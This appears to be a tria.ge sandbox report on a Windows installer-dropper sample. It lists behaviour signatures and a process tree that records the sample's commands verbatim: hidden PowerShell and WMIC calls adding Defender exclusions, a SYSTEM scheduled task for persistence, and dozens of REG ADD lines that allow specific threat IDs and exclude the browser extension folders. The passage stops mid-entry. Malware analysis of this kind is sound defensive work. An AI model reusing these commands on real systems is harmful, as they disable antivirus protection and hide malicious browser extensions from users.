Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240709-en
  • resource tags

    arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    23/07/2024, 22:38

General

  • Target

    abd0dafb3aaea8a512f51a4f7825559b3fe592c71db93037c5f322245c284253.exe

  • Size

    7.3MB

  • MD5

    58dae76cc8de8d43c761a0e496bc7363

  • SHA1

    41900ebf3454544999df4bd12637c3942e1bfe53

  • SHA256

    abd0dafb3aaea8a512f51a4f7825559b3fe592c71db93037c5f322245c284253

  • SHA512

    a19274c50bd28b7f27c62c3e47ef2050e6d4831c2b42625f91b42a67012255c5957f47615bb984f8cb058d6a68462498076159e4269750242fcf7e74bc939039

  • SSDEEP

    196608:91OWadibtmJ9kObrP2/xt6WEb8Tu7BVUGeBw4c9gH:3OWSiJmJxPCxt6p8rWe

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 31 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\abd0dafb3aaea8a512f51a4f7825559b3fe592c71db93037c5f322245c284253.exe
    "C:\Users\Admin\AppData\Local\Temp\abd0dafb3aaea8a512f51a4f7825559b3fe592c71db93037c5f322245c284253.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4004
    • C:\Users\Admin\AppData\Local\Temp\7zSDACF.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2244
      • C:\Users\Admin\AppData\Local\Temp\7zSDCE3.tmp\Install.exe
        .\Install.exe /yGwBwdidFcc "385132" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:3504
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          4⤵
          • Indirect Command Execution
          • Suspicious use of WriteProcessMemory
          PID:640
          • C:\Windows\SysWOW64\cmd.exe
            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2308
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4128
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:4848
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "bvkGxwJeLqTAkHhkNY" /SC once /ST 22:40:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSDCE3.tmp\Install.exe\" J8 /tGdiddkr 385132 /S" /V1 /F
          4⤵
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:1132
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 1432
          4⤵
          • Program crash
          PID:804
  • C:\Users\Admin\AppData\Local\Temp\7zSDCE3.tmp\Install.exe
    C:\Users\Admin\AppData\Local\Temp\7zSDCE3.tmp\Install.exe J8 /tGdiddkr 385132 /S
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4864
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
      2⤵
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1308
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4152
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3288
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3120
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1004
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
        3⤵
          PID:2788
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
          3⤵
          • System Location Discovery: System Language Discovery
          PID:780
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4184
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1804
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
          3⤵
          • System Location Discovery: System Language Discovery
          PID:5064
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4036
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3332
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1284
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2924
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4872
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1520
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
          3⤵
            PID:3972
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2040
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4452
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
            3⤵
              PID:3196
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2884
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4532
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
              3⤵
                PID:1772
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                3⤵
                  PID:1632
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1992
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:816
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4344
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                  3⤵
                    PID:2508
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:3764
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                    3⤵
                      PID:1692
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YRgOlsMFU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YRgOlsMFU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\feBXaFUrrMUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\feBXaFUrrMUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pmSQpDXEYtDmaklHKDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pmSQpDXEYtDmaklHKDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sfNQtIozxBdU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sfNQtIozxBdU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uqkcvgprzQBVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uqkcvgprzQBVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TwHQsXvOagBSxrVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TwHQsXvOagBSxrVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\sIbGVlYWmvcsolgye\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\sIbGVlYWmvcsolgye\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\FqJCjXFBIuEogUFe\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\FqJCjXFBIuEogUFe\" /t REG_DWORD /d 0 /reg:64;"
                    2⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4280
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YRgOlsMFU" /t REG_DWORD /d 0 /reg:32
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1540
                      • C:\Windows\SysWOW64\reg.exe
                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YRgOlsMFU" /t REG_DWORD /d 0 /reg:32
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:3848
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YRgOlsMFU" /t REG_DWORD /d 0 /reg:64
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1160
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\feBXaFUrrMUn" /t REG_DWORD /d 0 /reg:32
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:272
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\feBXaFUrrMUn" /t REG_DWORD /d 0 /reg:64
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:3776
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pmSQpDXEYtDmaklHKDR" /t REG_DWORD /d 0 /reg:32
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:3560
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pmSQpDXEYtDmaklHKDR" /t REG_DWORD /d 0 /reg:64
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4320
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sfNQtIozxBdU2" /t REG_DWORD /d 0 /reg:32
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:800
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sfNQtIozxBdU2" /t REG_DWORD /d 0 /reg:64
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1856
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uqkcvgprzQBVC" /t REG_DWORD /d 0 /reg:32
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4752
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uqkcvgprzQBVC" /t REG_DWORD /d 0 /reg:64
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4848
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TwHQsXvOagBSxrVB /t REG_DWORD /d 0 /reg:32
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:5008
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TwHQsXvOagBSxrVB /t REG_DWORD /d 0 /reg:64
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:3156
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2808
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1512
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                      3⤵
                        PID:1008
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1096
                      • C:\Windows\SysWOW64\reg.exe
